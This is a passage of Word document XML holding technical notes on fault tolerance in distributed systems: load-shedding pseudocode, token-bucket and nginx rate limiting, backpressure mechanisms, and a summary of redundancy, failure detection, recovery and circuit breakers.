    <w:p w14:paraId="21426617" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    P3: background sync, non-critical exports → shed under any pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5337E2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12937D12" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Admission control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31D635" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def handle_request(request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F391B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      priority = get_priority(request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29C085" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      current_load = get_system_load()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB7A39" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C9043" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      if current_load &gt; 0.95 and priority &lt; P0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD70C9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return 503 Service Unavailable  # shed low-priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BDEAB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      elif current_load &gt; 0.80 and priority &lt; P2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A2030" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return 503 Service Unavailable  # shed non-essential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146191A7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      elif current_load &gt; 0.70 and priority &lt; P3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D80B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return 503 Service Unavailable  # shed background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDEFC03" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176E6B8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return process(request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DDC56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AB1A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Token bucket rate limiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD0D8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Capacity: system can handle N requests per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDF6E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Token bucket: refills at N tokens/second, capacity = burst size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5A821" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533FB40F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Each incoming request: consume 1 token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB7485" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If bucket empty: request rejected (rate limited)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE200AF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654128C4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Burst handling: bucket allows burst up to capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5D653" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Normal: steady 100 req/s with capacity 1000 → bucket always full → no limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBEFF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Spike: 5000 req/s burst → quickly drain bucket → limit to 100 req/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0B675" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C949266" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  nginx rate limiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1427A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FF9B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    limit_req zone=api burst=200 nodelay;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBADE0E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5A85D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → 100 req/s per IP, allow burst of 200 without queuing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078CA22" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Excess: 429 Too Many Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF45BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="0A52E670" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Backpressure propagation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295EFF73" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Source: upstream service sending requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7AB16C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Sink: downstream service processing requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F5637C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6716C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A3339" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Source sends faster than sink can process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173BD645" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Buffers fill → memory exhausted → OOM crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97D042" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D60D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reactive backpressure (async systems):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26193BD3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Sink: signals to source "I can handle N items"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118E326" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Source: only sends N items (doesn't send more until requested)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEE5F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76585724" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Kafka consumer: fetch.max.bytes, max.poll.records → controls flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614054D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    gRPC streaming: flow control window (like TCP window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C3350" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Reactive Streams (RxJava, Reactor, Akka Streams): standard backpressure protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E963D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A74E5F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Bounded queues (blocking backpressure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02767F9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Queue capacity: 1000 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A4922" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    If full: producer blocks (or fails fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A45F72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE4479" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Java BlockingQueue: put() blocks when full, offer() returns false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5A84F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D68F2E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Database connection pool: if all connections in use → reject (connection timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F9F32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    HTTP connection pool: if maxConnections reached → queue request or 503</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAFF94" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="24EAB392">
          <v:rect id="_x0000_i6447" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BBB65F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375019AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5E069" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault Tolerance = Prevention + Detection + Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AED876" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                  Applied to every failure mode, at every system layer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3092C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">                  with formally specified guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E73C2CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3A0579A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault Classification (must know which type to choose response):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F180E32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fail-stop:     simplest — detect absence, failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E585E7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fail-slow:     hardest — timeout calibration, latency monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784EE4ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Byzantine:     hardest-to-handle — checksums, BFT protocols, redundant computation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B15B87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Network:       partition, loss, reorder, corrupt — assume all happen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010EE3D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Timing:        clock skew, leap, drift — use logical clocks for ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490435F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D75699B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Hardware Redundancy (physical fault tolerance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C613B79" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RAID:          disk fault tolerance (RAID 6 for production, ZFS for integrity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29335478" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ECC RAM:       memory bit error correction (mandatory for servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C4C52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Power:         dual PSU, UPS, generator (each power failure mode needs own redundancy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148BFA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Network:       bonded NICs, redundant switches (eliminate single points of failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC552A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Geographic:    multi-datacenter (survive datacenter-level failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BDF70" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007817C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Software Redundancy (logical fault tolerance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFF5BEC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Active-passive: simple failover, resource overhead, data loss risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51763976" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Active-active:  throughput scaling, consistency coordination required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873DB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  N-version:     independent implementations + voting (hardware &gt; software effectiveness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42571A6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DA0FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Detection (know when things break, fast):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1435D823" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Heartbeats:    interval + timeout → fail-stop detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B18277" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Phi detector:  adaptive suspicion level → handles network jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E70192" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Checksums:     CRC32C end-to-end → detect silent corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D341F13" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Assertions:    invariant checking in production → detect logic bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398D7FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Health checks: readiness + liveness → expose state for automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A31F0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EA8E76" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Recovery (restore correct operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6817D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  WAL:           write-ahead log → crash recovery (ARIES algorithm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A666353" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Checkpointing: periodic state snapshots → bounded replay time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD3C0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Idempotency:   safe retry → exactly-once semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F56A7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F02CD85" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Preventing Cascading Failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993432F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Circuit breaker: open → fail fast → recovery window → close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718509B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Bulkhead:        isolate resources → one failure doesn't consume all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D26855" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Timeout:         bound wait time → prevent indefinite blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF936DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA4F51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
